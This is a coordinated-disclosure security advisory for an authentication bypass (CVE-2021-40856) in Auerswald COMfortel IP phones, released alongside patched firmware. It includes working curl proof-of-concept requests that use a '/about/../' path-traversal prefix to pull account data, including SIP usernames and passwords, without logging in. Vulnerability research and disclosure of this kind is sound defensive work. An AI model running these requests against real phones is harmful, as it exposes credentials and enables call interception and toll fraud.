Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass


RedTeam Pentesting discovered a vulnerability in the web-based
configuration management interface of the Auerswald COMfortel 1400 and
2600 IP desktop phones. The vulnerability allows accessing configuration
data and settings in the web-based management interface without
authentication.


Details
=======

Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP
Affected Versions: <= 2.8F
Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.auerswald.de
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004
Advisory Status: published
CVE: CVE-2021-40856
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856


Introduction
============

"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and
IP system phone), with 4.3" colour touch display and preconfigured
answering machine"

(from the vendor's homepage)


More Details
============

During a penetration test it was discovened that several VoIP phones
(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow
accessing administrative functions without login credentials, bypassing
the authentication. This can be achieved by simply prefixing API
endpoints that require authentication with "/about/../", since the
"/about" endpoint does not require any authentication.


Proof of Concept
================

The phones run a web-based management interface on Port 80. If accessed,
the HTTP response code 401 together with a website redirecting to the
path "/statics/pageChallenge.html" is returned. This can for example be
seen using the command-line HTTP client curl[1] as follows:

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/'
HTTP/1.1 401 Unauthorized
[...]

<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
------------------------------------------------------------------------

The website contains JavaScript code that requests the path
"/about?action=get" and loads a JSON document (formatted and shortened
to increase readability):

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/about?action=get'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3673
Date: Mon, 30 Aug 2021 08:39:24 GMT
Server: lighttpd

{
  "DATA": {
    "firmware": {
      "TYPE": "DATAITEM",
      "VALUE": "2.8E",
      "KEY": "firmware"
    },
    "serial": {
      "TYPE": "DATAITEM",
      "VALUE": "1234567890",
      "KEY": "serial"
    },
    [...]
  }
}

------------------------------------------------------------------------

Among other information, this JSON document contains the serial number
and firmware version displayed on the website. This action can be
accessed without authentication. Other endpoints require authentication,
for example the path "/tree?action=get", from which the menu structure
is loaded after successful authentication:

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/tree?action=get'
HTTP/1.1 401 Unauthorized
[...]

<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
------------------------------------------------------------------------

During the penetration test, it was discovered that this action can
successfully be requested by inserting the prefix "/about/../". In order
to prevent curl from normalizing the URL path, the option "--path-as-is"
must be supplied:

------------------------------------------------------------------------
$ curl --include --path-as-is \
  'http://192.168.1.190/about/../tree?action=get'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3808
Date: Mon, 30 Aug 2021 08:42:11 GMT
Server: lighttpd

{
  "TYPE": "TREENODEPAGE",
  "ITEMS": {
    "COUNT": 2,
    "TYPE": "ITEMLIST",
    "1": {
      "id": 31,
      "text": "applications_settings",
      "TYPE": "TREENODEPAGE",
      "ITEMS": {
        "COUNT": 1,
        "TYPE": "ITEMLIST",
        "0": {
          "target": "pageFunctionkeys.html",
          "id": 32,
          "action": "/functionkeys",
          "text": "key_app",
          "pagename": "Functionkeys",
          "TYPE": "TREENODEPAGE"
        }
      }
    },
    [...]
  }
}
------------------------------------------------------------------------

The endpoint "/account" allows listing account data:

------------------------------------------------------------------------
$ curl --include --path-as-is \
  'http://192.168.1.190/about/../account?action=list'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 793
Date: Mon, 30 Aug 2021 08:43:33 GMT
Server: lighttpd

{
  "DATA": {
    [...]
    "accountList0": {
      "KEY": "accountList0",
      "COUNT": 1,
      "TYPE": "DATAMODEL",
      "VALUE": {
        "0": {
          "ID": 32327,
          "PARENTID": 0,
          "PROVIDER": "ProviderName",
          "NAME": "123 Example User",
          "STATUS": 4,
          "DEFAULT": 1
        }
      },
      [...]
    },
  }
}
------------------------------------------------------------------------

The ID 32327 can then be used to get details about that particular
account, including the username and password:

------------------------------------------------------------------------
$ curl --include --path-as-is \
  'http://192.168.1.190/about/../account?action=get&itemID=32327'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 2026
Date: Mon, 30 Aug 2021 08:44:13 GMT
Server: lighttpd

{
  "DATA": {
    [...]
    "Benutzer": {
      "TYPE": "DATAITEM",
      "VALUE": "123",
      "KEY": "Benutzer"
    },
    "Passwort": {
      "TYPE": "DATAITEM",
      "VALUE": "secret",
      "KEY": "Passwort"
    },
    [...]
  }
}
------------------------------------------------------------------------

Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to
access and use the web-based management interface as if regular login
credentials were presented.

It is likely that other functionality can be accessed in the same way,
to for example change settings or activate the integrated option for
recording the Ethernet traffic.


Workaround
==========

Disable the web-based management interface if possible.


Fix
===

Upgrade to a firmware version which corrects this vulnerability.


Security Risk
=============

Inserting the prefix "/about/../" allows bypassing the authentication
check for the web-based configuration management interface. This enables
attackers to gain access to the login credentials used for
authentication at the PBX, among other data.

Attackers can then authenticate at the PBX as the respective phone and
for example call premium rate phone lines they operate to generate
revenue. They can also configure a device they control as the PBX in the
phone, so all incoming and outgoing phone calls are intercepted and can
be recorded. The device also contains a function to record all Ethernet
data traffic, which is likely affected as well.

Overall, the vulnerability completely bypasses the authentication for
the web-based management interface and therefore poses a high risk.


References
==========

[1] https://curl.se
[2] https://github.com/zaproxy/zaproxy/

Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-04 Vendor provides access to device with fixed firmware
2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-10-14 Vendor releases corrected firmware version 2.8G
2021-12-06 Advisory published


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen